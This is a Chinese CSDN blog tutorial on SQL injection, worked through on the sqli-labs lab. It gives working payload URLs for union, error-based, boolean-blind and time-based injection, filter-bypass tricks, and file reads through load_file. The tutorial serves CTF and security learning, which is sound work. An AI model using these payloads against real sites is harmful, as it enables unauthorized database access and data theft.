SQL注入攻击入门详解

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量524 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43906500/article/details/114046035
版权

SQL注入 报错注入 联合查询 盲注 安全防护
关键词由CSDN通过智能技术生成

参考书目:《CTF特训营》《从0到1CTFer成长之路》

目录

1 什么是SQL注入

2 可回显的注入

2.1 可以联合查询的注入

2.2 报错注入

2.2.1 updatexml

2.2.2 floor

2.2.3 exp

3 不可回显的注入

3.1 Bool盲注

3.2 时间注入

1 什么是SQL注入

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

SQL注入的分类:

1)可回显的注入

  • 可以联合查询的注入
  • 报错注入
  • 通过注入进行DNS请求,从而达到可回显的目的

2)不可回显的注入

  • Bool盲注
  • 时间注入

3)二次注入

2 可回显的注入

2.1 可以联合查询的注入

测试使用的环境:sqlilab lesson1

源码如下

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

联合查询只需闭合前面的单引号,注释掉后面的单引号,中间写上需要的payload即可

注意传递参数时遇到+,查询语句中并没有加号,这是因为服务器在处理用户输入时自动将加号转义为空格

http://1.15.59.63:81/Less-1/index.php?id=-5%27%20union%20select%201,database(),3%20--%20

注意注释后面引号时要使用"--%20"

成功注入

2.2 报错注入

测试使用的环境:sqlilab lesson5

2.2.1 updatexml

updatexml(XML_document, XPath_string, new_value)

XML_document是文档对象的名称

XPath_string是XPath格式的字符串(如果XPath_string不是XPath格式,则会报错并显示出XPath_string的值)

new_value替换查找到的数据

// connectivity 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

updatexml(1,concat(1,payload),1)。

concat()函数用于将多个字符串连接成一个字符串,目的是让拼接后的字符串不符合XPath格式使其报错,显示出要查的对象。

http://1.15.59.63:81/Less-5/index.php?id=-1%27%20union%20select%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--%20

成功注入

2.2.2 floor

参考链接:https://blog.csdn.net/zpy1998zpy/article/details/80650540

floor()报错注入准确地说应该是floor,count,group by冲突报错

是当这三个函数在特定情况一起使用产生的错误。

and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a

loor(rand(0)*2)x的x是为floor(rand(0)*2)添加了一个别名,就是x就等于floor(rand(0)*2),这样做的目的是让group by 和 floor(rand(0)*2)相遇,造成冲突报错

http://1.15.59.63:81/Less-5/index.php?id=-1%27%20union%20select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a%23

2.2.3 exp

exp报错的本质原因时溢出报错

http://1.15.59.63:81/Less-5/index.php?id=-1%27%20union%20select%201,2,exp(~(select%20*%20from%20(select%20user())x))--%20

3 不可回显的注入

3.1 Bool盲注

测试使用的环境:sqlilab lesson8

源码如下

// connectivity 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

这条语句判断mysql中的version函数的返回值的第一个字符是否为5,通过前面的知识可知道,当条件成立时,页面将显示有You are in,否则没有。

通过类似的手段我们可以获取到database(),@@datadir,user(),以及整个数据库的信息。

http://1.15.59.63:81/Less-8/index.php?id=1%27%20and%20substr(version(),1,1)=5--+

测试结果如下

3.2 时间注入

测试使用的环境:sqlilab lesson9

源码如下

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

时间盲注的本质时由于服务器拼接了sql语句,但是正确和错误存在同样的回显。错误信息被过滤,不过,可以通过页面响应时间进行按位判断数据

http://1.15.59.63:81/Less-9/index.php?id=1%27%20and%20if(substr(version(),1,1)=5,sleep(10),1)--+

测试如下所示

4 注入点的位置及发现

4.1 常见注入点的位置

  • GET参数中注入
  • POST参数中注入
  • User-Agent中注入

            可以通过设置sqlmap的参数level=3,这样sqlmap会自动检测User-Agent是否存在注入点

  • Cookies中注入

            可以通过设置sqlmap的参数level=2,这样sqlmap会自动检测Cookies是否存在注入点

4.2 判断注入点是否存在

  • 插入单引号
  • 数字型判断
  • 通过数字的加减进行判断

5 SQL注入绕过

5.1 过滤关键字

即过滤如select or from等关键字。有些题目中未设置递归过滤,而且刚好将关键字替换为空。这时可以使用穿插关键字的方法进行绕过操作。

如:selselectect

也可以通过大小写转换

如果过滤函数通过十六进制进行过滤,可以对关键字的个别字母进行替换

select selec\x74

或者通过双重URL编码绕过

5.2 过滤空格

1)通过注释绕过空格符

#、--、//、/**/、;%00

select/**/username

2)通过URL编码绕过

%20

3)通过空白字符绕过

如换行符

4)通过特殊符号,利用反引号绕过空格

select`user`

5)科学计数法绕过

5.3 过滤单引号

魔术引号,也就是PHP配置文件php.ini中magic_quote_gpc

5.4 绕过相等过滤

mysql中存在utf8_unicode_ci和utf8_general_ci两种编码格式

utf8_general_ci不仅不区分大小写,而且A''=A也成立

5 SQL读写文件

在用户拥有File权限的情况下,可以使用load_file和into outfile/dumpfile进行读写

?id=-1+union+select+load_file('/etc/hosts')

写入类似

金鳞本鲤
关注
专栏目录
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1423
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
sql注入攻击详解
02-24
sql注入攻击的详细讲解sql注入攻击的详细讲解
菜鸟入门级:SQL注入攻击
巅峰测试
08-03 1198
 文章来源:网页吧     一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞,下面我讲解攻击方法   在地址栏:   and 1=1   查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表   在地址栏:   and 0  返回页正常,假设成立了。   下面来猜猜看一下管理员表里面有几个
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1121
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
SQL注入攻击教程
Charlie0328的博客
06-27 842
工具/原料 SQLi Labs 方法/步骤1: 安装SQLi Labs 我们的游(xue)戏(xi)环境采用的是经典的Apache+MySQL+PHP,大家可以直接下载集成环境软件完成环境的部署。目前比较流行的有phpStudy、Wampserver、XAMPP和AppServ,个人推荐使用phpStudy,因为它是绿色版无需安装且比较适合新手使用。当然了,几款也不错。安装好以后启动服务器(以phpStudy为例),然后在浏览器中访问localhost或127.0.0.1,如果显示了php环境信息,则说明安
SQL注入攻击常见方式及测试方法
热门推荐
Lambda_Y的博客
11-04 11万+
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? SQL注入
sql注入攻击详解(一)sql注入原理详解
gtlishujie的博客
07-04 1670
一、什么是sql注入呢?         所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过
SQL注入攻防入门详解
11-12
3. 应用防火墙和WAF:配置适当的规则,拦截SQL注入攻击。 4. 教育和培训:提高开发人员的安全意识,避免编写易受攻击的代码。 总之,理解SQL注入的原理和危害是防止这类攻击的关键。通过采取合适的防御措施,结合...
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
sql注入入门教程(附源码分析)
03-07
- 盲注是一种特殊的SQL注入攻击攻击者无法直接看到查询结果,而是通过观察页面变化或响应时间来判断。 - 主要有三种类型:布尔型盲注、基于时间的盲注和基于错误的盲注。 2. **布尔型盲注** - 攻击者通过构造...
SQL注入攻击的种类和防范手段,代码教程
06-23
SQL注入攻击的种类和防范手段,代码教程,知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
sql注入攻击详解(二)sql注入过程详解
cuiyaoqiang的博客
06-11 3543
在上篇博客中我们分析了sql注入的原理,今天我们就来看一下sql注入的整体过程,也就是说如何进行sql注入,由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是:1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5
SQL注入攻击入门
xcxhzjl的博客
11-19 3695
目录 一、SQL注入的原理 SQL注入漏洞的条件 二、SQL注入的危害 三、SQL注入的分类 1、注入点数据类型分类 (1)数字型注入 (2)字符型注入 2、注入点位置分类 3、注入方法分类 (1)布尔型注入 (2)报错型注入 (3)延时注入 (4)联合查询注入 (5)宽字节注入 (6)多语句查询注入 四、SQL注入的防御 五、WAF绕过方法 六、SQLMAP 一、SQL注入的原理 SQL注入是一种针对后台数据库的攻击手段,攻击者把精心构造的恶意SQL命令插入到Web
SQL注入攻击(基础)
scholar_1的博客
07-08 1219
书生这次准备了一份sql注入攻击的靶场演练教程以封神台在线演练靶场为例(像游戏一样一关关过),就说第一章吧题目如下:要求是通过sql注入来获得管理员的密码点击传送门,出现这样一个网页:那么,第一步,确定目标,这里是: 接下来第二步,来判断这里是否存在SQL注入的漏洞开始操作: 看来,页面返回正常,接着下一个 看,页面返回不正常了,所以我判断,这里可能会存在一个SQL注入漏洞好,开始第三步,判断他有多少字段一步步来,从1开始试探 可以看到页面显示正常,接下来,测2 页面返回正常,然
Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解
红太阳照大地
10-24 209
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢? 所谓SQL...
2020-10-10
不二的博客
10-10 988
一:什么是sql注入   SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二:SQL注入攻击的总体思路    1:寻找到SQL注入的位置   2:判断服务器类型和后台数据库类型   3:针对不同的服务器和数据库特点进行SQL注入攻击 三:SQL注入攻击实例 String sql = "select * from user_table where username= ' "+us..
SQL注入攻击详解与防范指南
这篇教程旨在帮助安全专家和开发人员理解SQL注入的机制,提高他们识别和防止这类攻击的能力。对于那些已经有一定经验的读者,它提供了更高级的策略和技巧;对于新手,它提供了一个全面的入门指南,以避免常见的误区...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值